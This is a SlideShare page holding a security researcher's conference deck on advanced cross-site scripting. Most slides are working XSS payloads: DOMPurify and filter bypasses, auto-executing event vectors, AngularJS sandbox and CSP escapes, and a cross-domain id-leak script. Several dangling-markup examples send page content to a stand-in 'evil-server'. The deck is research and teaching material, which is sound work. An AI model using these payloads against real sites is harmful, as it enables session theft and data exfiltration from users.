SlideShare a Scribd company logo
XSS magic tricks
Advancements in XSS
By Gareth Heyes
@garethheyes
• I ❤ hacking JavaScript















• I'm a researcher at PortSwigger
• Follow me on Twitter @garethheyes
About me
<a href=# name=x id=x>Click me on IE11</a>
<script event="onclick(blah)<wtfbbq>{}" for=x>
blah.view.alert(1)
</script>
<script event=onload for=window>
return alert(2)};{
</script>
Hacking filters
• Consuming tags
• title, noscript, style, script, noembed, textarea, plaintext,
template, iframe, noframes







• Template tag breaks out of select element
<noframes>
<img alt=" ">
</noframes>
<img alt=" ">
</noframes>
</noframes><script>alert(1)</script>
Hacking filters
<template><select><option></template><img
src=1 onerror=alert(1)></select></template>
• Title exists in SVG and HTML
• Title consumes markup in HTML but not in SVG
• HTML in SVG?
Hacking filters
Hacking filters
<svg>
<image>
<title>
<img title="</title><script>alert(1)</script>">
</title>
</svg>
🚫
Hacking filters
<svg>
<img>
<title>
<img title="</title><script>alert(1)</script>">
</title>
</svg>
✅
• Edge bug causes title mutate
• E.g. 

in: <title>&lt;img&gt;

out:<title><img>
• I used this bug to bypass DOMPurify
• in: <x/><title>&lt;/title&gt;&lt;img src=1
onerror=alert(1)&gt;

out: <title></title><img src="1">
• What about double HTML encoded?
• in: <x/><title>&amp;lt;/title&amp;gt;&amp;lt;img src=1
onerror=alert(1)&amp;gt;

out: <title></title><img src=1 onerror=alert(1)></title>
Hacking filters
• Invalid attributes

<img ="/src/onerror=alert(1)//">
• HTML closing comments Firefox (version <=67)

<!-- --!

><img src=1 onerror=alert(1)> -->
• HTML opening comments Firefox (version 68.0.1)

<!-[x00][x00][x00][x00][x00]- ><div title="--><img
src=1 onerror=alert(1)>"></div>
Hacking filters
• Firefox allows NULLs in entities
• <a href="javascript&[0x00]#x6a;avascript:alert(1)">

test</a>
• <a href="javascript&[0x00]colon[0x00];alert(1)">

test</a>
Hacking filters
• Safari base tag
• <base href="javascript:/a/-alert(1)///////">
• Turns every relative URL into XSS
• <a href=../lol/safari.html>test</a>
• <a href>haha</a>
Hacking filters
XSS without parenthesis
and semi-colons
• Everyone knows about alert`1`
• I found you could do: onerror=alert;throw 1
• throw accepts a JavaScript expression
XSS without parenthesis and semi-colons
• JavaScript expressions
• x = (1,2);

x//2
• Right hand side of expression is returned
XSS without parenthesis and semi-colons
throw onerror=alert,'some string',
123,'haha'
• First part of the expression is executed sets the error handler
• Last part of the expression is sent to exception handler
XSS without parenthesis and semi-colons
• How can you eval a string?
• Prefixed with uncaught
• Change it to an assignment



throw onerror=eval,"=alertx281x29"

//Uncaught = alert(1)
XSS without parenthesis and semi-colons
{onerror=eval}

throw{lineNumber:1,
columnNumber:1,

fileName:1,

message:'alertx281x29'}
• Firefox prefixes exception message with:

uncaught exception: 1
• How can we get round this?
XSS without parenthesis and semi-colons
Hidden inputs
• XSS in hidden input
• Unexploitable when <> is filtered?

<input type="hidden" value="XSS HERE">
• Access keys to the rescue!
• "The accesskey global attribute provides a hint for generating a
keyboard shortcut for the current element." mdn
Hidden inputs
• Firefox allows onclick event + access keys
• <input type="hidden" accesskey="x"
onclick="alert(1)">

(ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
• Firefox only but the technique can be used on Chrome
Hidden inputs
Link elements
• Access keys can be used on Chrome
• Hidden inputs don't work
• Other elements link, meta etc do

<link rel="canonical" accesskey="X"
onclick="alert(1)" />

(ALT+SHIFT+X on Windows) (CTRL+ALT+X on OS X)
Link elements
Dangling markup
• Uses incomplete markup to extract parts of the page
• <img src='//evil-server?
• HTML parser finds an incomplete src attribute
• Looks for ' to close the attribute
Dangling markup
• Example dangling markup attacks
• <table><tfoot background="//evil-server?
• <link rel=icon href="//evil-server?
• <video><source src="//evil?
Dangling markup
• Chrome protects against dangling markup attacks
• "Resource requests whose URLs contained both removed
whitespace (`n`, `r`, `t`) characters and less-than characters
(`<`) are blocked." https://www.chromestatus.com/feature/
5735596811091968
• CSP will also block external requests if specified in the policy
Dangling markup
• Bypassing restrictive CSP & Chrome mitigations
• CSP: default-src 'none'; base-uri 'none';
• <base target="
• Sets target for every link
• The markup will get passed in the window name
Dangling markup
• <a href=//evil-server><font size=100 color=red>You
must click me</font></a><base target="
• Anchor points to evil server
• HTML styling is used to get round no inline styles
• Target consumes all markup until the " is found
• Clicking the link loads attackers server which reads
window.name that contains the consumed markup
Dangling markup
• Mitigation <base target="_self" />
• Prevents target being overwritten
• Bypass requires 2 clicks
• <input name=x type=hidden form=x
value="&lt;a href=//evil-server&gt;&lt;font
size=100 color=red&gt;Click me second&lt;/
font&gt;&lt;/a&gt;"><button form=x><font
size=100 color=red>Click me first</font></
button><form id=x target="
Dangling markup
Auto executing vectors
• Firefox onloadstart

<img src=1 onloadstart=alert(1)>
• Firefox onloadend

<img src=1 onloadend=alert(1)>
• <video><track default onload=alert(1) src="data:text/
vtt,WEBVTT"></video>
Auto executing vectors
• Chrome

<svg><discard onbegin=alert(1)>
• Safari

<svg><anything onload=alert(1)>
• General svg 

<svg><animate onbegin=alert(1) attributename=x
dur=1s>

<svg><set onend=alert(1) attributename=x dur=1s>

<svg><animatetransform onrepeat=alert(1)
attributename=x dur=1s repeatcount=2>
Auto executing vectors
• <body onpageshow=alert(1)>
• <body onpopstate=alert(1)>

<iframe src=//x-domain.com onload="if(!window.flag)
{this.contentWindow.location='//x-domain.com/#';flag=1}">
• <body onhashchange="alert(1)">

<iframe src=//x-domain.com onload="if(!window.flag)
{this.contentWindow.location='//x-
domain.com#';window.flag=1;}">
• <body onmessage=alert(1)>

<script>

postMessage('test','*')

</script>
Auto executing vectors
• <body
onbeforeunload="location='javascript:alert(1)'">

<iframe src=//x-domain.com onload="if(!window.flag)
{this.contentWindow.location='//x-
domain.com#';flag=1}">
• <body onresize="alert(1)">

<iframe src=//x-domain.com
onload="this.style.width='1000px'">
• <body onscroll=alert(1)><div style=height:1000px></
div><div id=x></div>
Auto executing vectors
• <style>

@keyframes x{

}

</style>

<b style="animation-name:x"
onanimationstart="alert(1)"></b>

<b style="-webkit-animation-name:x"
onanimationstart="alert(1)"></b>
• Discovered by the legend Mario Heiderich
• Executes on every tag but requires an injected style
Auto executing vectors
• ontransitionend works on Chrome
• <style>

:target {

color:red;

}

</style>

<x id=x style="transition:color 1s"
ontransitionend=alert(1)>
• URL: page.html#x
Auto executing vectors
• ontransitionrun works on Firefox
• <style>

:target {

color:red;

}

</style>

<x id=y style="transition:color 2s"
ontransitionrun=alert(1)>
• URL: page.html
• URL: page.html#x
Auto executing vectors
• Firefox ontransitioncancel
• <style>

:target {

color: red;

}

</style>

<x id=x style="transition:color 10s"
ontransitioncancel=alert(1)>
• URL: page.html#
• URL: page.html#x
• URL: page.html#
Auto executing vectors
• Remember the classic vector?

<input autofocus onfocus=alert(1)>
• Autofocus required?
• Nope 😀 <input onfocus=alert(1) id=x>
• URL: page.html#x
Auto executing vectors
• onblur becomes auto executable (Every browser except Firefox)
• <input onblur=alert(1) id=x><input autofocus>

<textarea onblur=alert(1) id=x></textarea><input
autofocus>

<button onblur=alert(1) id=x></button><input
autofocus>

<select onblur=alert(1) id=x></select><input autofocus>
• URL: page.html#x
• Focus events fire for iframes too
• <body onblur=alert(1)><iframe id=x></iframe>

<iframe id=x onblur=alert(1)></iframe><input
autofocus>
Auto executing vectors
• <embed id=x onfocus=alert(1) type=text/html>
• <object id=x onfocus=alert(1) type=text/html>
• <video id=x controls onfocus=alert(1)>

<source src="validvideo.mp4" type=video/mp4>

</video>
• <audio id=x controls onfocus=alert(1) id=x>

<source src="validaudio.wav">

</audio>
Auto executing vectors
AngularJS
• Standard AngularJS sandbox escape:

{{constructor.constructor('alert(1)')()}}
• Can we make it shorter?
• {{$eval.constructor('alert(1)')()}}
• Shorter still?

{{$on.constructor('alert(1)')()}}

//Credits Lewis Ardern
AngularJS
• What if you can't call $eval? e.g. in a orderBy filter
• Can't use strings
• {{toString().constructor.prototype.charAt=[].join;
[1,2]|
orderBy:toString().constructor.fromCharCode(120,61,9
7,108,101,114,116,40,49,41)}}
AngularJS
• CSP bypass for all versions of AngularJS
• 63 characters!
• <input id=x ng-focus=$event.path|
orderBy:'CSS&&[1].map(alert)'>
• page.html#x
• Cross browser:

<input id=x ng-focus=$event.composedPath()|
orderBy:'CSS&&[1].map(alert)'>
AngularJS
XS-Leak
• Focus event fires for iframe, input etc
• Can we detect if this happens cross domain?
• If it can be detected then id's can be bruteforced x-domain
XS-Leak
• onblur event will be fired when cross domain element is
focused
• Hash can be checked multiple times with only 1 http request
• Requires a frame-able page
XS-Leak
XS-Leak
Cross domain input element
Same origin onblur event
Same origin, shows current position
<input id=1337>
<body onblur="if(!window.found){window.found=true;alert('Found:
'+pos)}">
<div id=y></div>
pos = 1000;found = false;
var iframe = document.createElement('iframe');iframe.src='//x-domain.com';
document.body.appendChild(iframe);iframe.onload = next;
function next() {
if(!found){
document.getElementById('y').textContent = pos;
iframe.src='//x-domain.com#'+pos;
timer = setTimeout(function(){
if(!found && pos < 2000) {
pos++;
}
next();
},50);
}
}
//http://portswigger-labs.net/x-domain_leak_focus_095FD68DF/
XS-Leak
Auto execute on every tag?
• "The tabindex global attribute indicates if its element can be
focused, and if/where it participates in sequential keyboard
navigation" mdn
• <a onfocus=alert(1) id=x tabindex=1>
• <div onfocus=alert(1) id=x tabindex=1>
• <xss onfocus=alert(1) id=x tabindex=1>
• page.html#x
Auto execute on every tag?
• Works on pretty much every tag
• Link works but requires display block
• <link onfocus=alert(1) id=x tabindex=1
style=display:block>
• Link works in the body but not head
Auto execute on every tag?
• <a onfocusin=alert(1) id=x tabindex=1>
• <div onfocusin=alert(1) id=x tabindex=1>
• <xss onfocusin=alert(1) id=x tabindex=1>
• <xss onfocusout=alert(1) id=x tabindex=1><input
autofocus>
• page.html#x
Auto execute on every tag?
• IE activate/beforeactivate event
• <a onactivate=alert(1) id=x tabindex=1>
• <div onactivate=alert(1) id=x tabindex=1>
• <xss onactivate=alert(1) id=x tabindex=1>
• <xss onbeforeactivate=alert(1) id=x tabindex=1>
• page.html#x
Auto execute on every tag?
• IE deactivate/beforedeactivate event
• <a ondeactivate=alert(1) id=x tabindex=1></
a><input id=y autofocus>
• <xss ondeactivate=alert(1) id=x tabindex=1></
xss><input id=y autofocus>
• <xss onbeforedeactivate=alert(1) id=x tabindex=1></
a><input id=y autofocus>
• page.html#x
• page.html#y
Auto execute on every tag?
Questions?
thanks and shout outs to
@garethheyes
James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben
Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a,
Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol,
jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud
Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus
Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski
<img src=1 onerror="alert('Wait. What. IE/Edge')};while(true)sendMeToTheJSBlackHole();function lol(){">

More Related Content

What's hot

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
Masato Kinugawa
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
bugcrowd
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
Soroush Dalili
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
Frans Rosén
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
Mikhail Egorov
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
Sergey Belov
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Frans Rosén
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
Frans Rosén
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
DirkjanMollema
 
Exploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaExploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in Java
CODE WHITE GmbH
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
Abraham Aranguren
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
Mikhail Egorov
 

What's hot (20)

The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
 
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS FilterX-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
X-XSS-Nightmare: 1; mode=attack XSS Attacks Exploiting XSS Filter
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility Cloak
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protection
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win bigLive Hacking like a MVH – A walkthrough on methodology and strategies to win big
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
A story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEMA story of the passive aggressive sysadmin of AEM
A story of the passive aggressive sysadmin of AEM
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
I'm in your cloud... reading everyone's email. Hacking Azure AD via Active Di...
 
Exploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in JavaExploiting Deserialization Vulnerabilities in Java
Exploiting Deserialization Vulnerabilities in Java
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
 
Securing AEM webapps by hacking them
Securing AEM webapps by hacking themSecuring AEM webapps by hacking them
Securing AEM webapps by hacking them
 

Similar to XSS Magic tricks

Web application Security
Web application SecurityWeb application Security
Web application Security
Lee C
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
Дмитрий Бумов
 
Rails Security
Rails SecurityRails Security
Rails Security
Wen-Tien Chang
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
GiorgiRcheulishvili
 
JavaScript
JavaScriptJavaScript
JavaScript
tutorialsruby
 
JavaScript
JavaScriptJavaScript
JavaScript
tutorialsruby
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
Justin Cataldo
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
Devnology
 
HTML5 New and Improved
HTML5   New and ImprovedHTML5   New and Improved
HTML5 New and Improved
Timothy Fisher
 
Jquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript BasicsJquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript Basics
EPAM Systems
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
OWASP Khartoum
 
Build a game with javascript (may 21 atlanta)
Build a game with javascript (may 21 atlanta)Build a game with javascript (may 21 atlanta)
Build a game with javascript (may 21 atlanta)
Thinkful
 
jQuery
jQueryjQuery
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
Chris Shiflett
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
Sam Bowne
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
Xml part 6
Xml part 6Xml part 6
Xml part 6
NOHA AW
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
Wim Godden
 
Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!
Gill Cleeren
 

Similar to XSS Magic tricks (20)

Web application Security
Web application SecurityWeb application Security
Web application Security
 
ZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSSZeroNights 2018 | I <"3 XSS
ZeroNights 2018 | I <"3 XSS
 
Rails Security
Rails SecurityRails Security
Rails Security
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
JavaScript
JavaScriptJavaScript
JavaScript
 
JavaScript
JavaScriptJavaScript
JavaScript
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
#NewMeetup Performance
#NewMeetup Performance#NewMeetup Performance
#NewMeetup Performance
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
HTML5 New and Improved
HTML5   New and ImprovedHTML5   New and Improved
HTML5 New and Improved
 
Jquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript BasicsJquery Complete Presentation along with Javascript Basics
Jquery Complete Presentation along with Javascript Basics
 
Cross Site Scripting (XSS)
Cross Site Scripting (XSS)Cross Site Scripting (XSS)
Cross Site Scripting (XSS)
 
Build a game with javascript (may 21 atlanta)
Build a game with javascript (may 21 atlanta)Build a game with javascript (may 21 atlanta)
Build a game with javascript (may 21 atlanta)
 
jQuery
jQueryjQuery
jQuery
 
Evolution Of Web Security
Evolution Of Web SecurityEvolution Of Web Security
Evolution Of Web Security
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 2 of 3)
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Xml part 6
Xml part 6Xml part 6
Xml part 6
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!Top 10 HTML5 features every developer should know!
Top 10 HTML5 features every developer should know!
 

Recently uploaded

Christine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptxChristine's Product Research Presentation.pptx
Christine's Product Research Presentation.pptx
christinelarrosa
 
Must Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during MigrationMust Know Postgres Extension for DBA and Developer during Migration
Must Know Postgres Extension for DBA and Developer during Migration
Mydbops
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
 
From Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMsFrom Natural Language to Structured Solr Queries using LLMs
From Natural Language to Structured Solr Queries using LLMs
Sease
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Pitangent Analytics & Technology Solutions Pvt. Ltd
 
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham HillinQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
inQuba Webinar Mastering Customer Journey Management with Dr Graham Hill
LizaNolte
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
 
"What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w..."What does it really mean for your system to be available, or how to define w...
"What does it really mean for your system to be available, or how to define w...
Fwdays
 
What is an RPA CoE? Session 1 – CoE Vision
What is an RPA CoE?  Session 1 – CoE VisionWhat is an RPA CoE?  Session 1 – CoE Vision
What is an RPA CoE? Session 1 – CoE Vision
DianaGray10
 
Session 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdfSession 1 - Intro to Robotic Process Automation.pdf
Session 1 - Intro to Robotic Process Automation.pdf
UiPathCommunity
 
Day 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio FundamentalsDay 2 - Intro to UiPath Studio Fundamentals
Day 2 - Intro to UiPath Studio Fundamentals
UiPathCommunity
 
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptxPRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
PRODUCT LISTING OPTIMIZATION PRESENTATION.pptx
christinelarrosa
 
High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024High performance Serverless Java on AWS- GoTo Amsterdam 2024
High performance Serverless Java on AWS- GoTo Amsterdam 2024
Vadym Kazulkin
 
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance PanelsNorthern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving | Modern Metal Trim, Nameplates and Appliance Panels
Northern Engraving
 
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyFreshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-Efficiency
ScyllaDB
 
QA or the Highway - Component Testing: Bridging the gap between frontend appl...
QA or the Highway - Component Testing: Bridging the gap between frontend appl...QA or the Highway - Component Testing: Bridging the gap between frontend appl...
QA or the Highway - Component Testing: Bridging the gap between frontend appl...
zjhamm304
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Chart Kalyan
 
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeckPoznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
Poznań ACE event - 19.06.2024 Team 24 Wrapup slidedeck
FilipTomaszewski5
 
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
LF Energy Webinar: Carbon Data Specifications: Mechanisms to Improve Data Acc...
DanBrown980551
 

Recently uploaded (20)

